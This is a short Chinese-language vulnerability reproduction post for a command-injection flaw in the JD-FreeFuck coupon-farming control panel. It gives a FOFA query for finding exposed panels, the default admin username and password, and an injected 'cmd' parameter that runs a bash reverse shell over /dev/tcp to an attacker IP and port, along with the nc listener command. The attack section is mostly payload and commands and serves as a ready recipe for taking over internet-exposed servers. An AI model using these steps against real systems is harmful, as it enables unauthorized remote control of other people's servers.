JD-FreeFuck 后台命令执行漏洞
漏洞说明
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器
项目地址:https://github.com/meselson/JD-FreeFuck
环境搭建
脚本一键部署:
bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)
漏洞复现
FOFA搜索
title="京东薅羊毛控制面板"
访问后登录页面
![image-20210413180417572](https://i-blog.csdnimg.cn/blog_migrate/78f69cb06f80bc8c204bcc9e4642918b.png)
默认用户名密码:
useradmin
supermanito
![image-20210413180601261](https://i-blog.csdnimg.cn/blog_migrate/ad1fcc2811efe41193e40a397da60ba0.png)
手动执行脚本---切换换行抓包
![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)
然后发送包:
![Snipaste_2021-04-14_10-17-58](https://i-blog.csdnimg.cn/blog_migrate/b0c6acb8300aaee854fc3289973ebfc9.png)
反弹shell
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now
监听端:
nc -lvvp 44444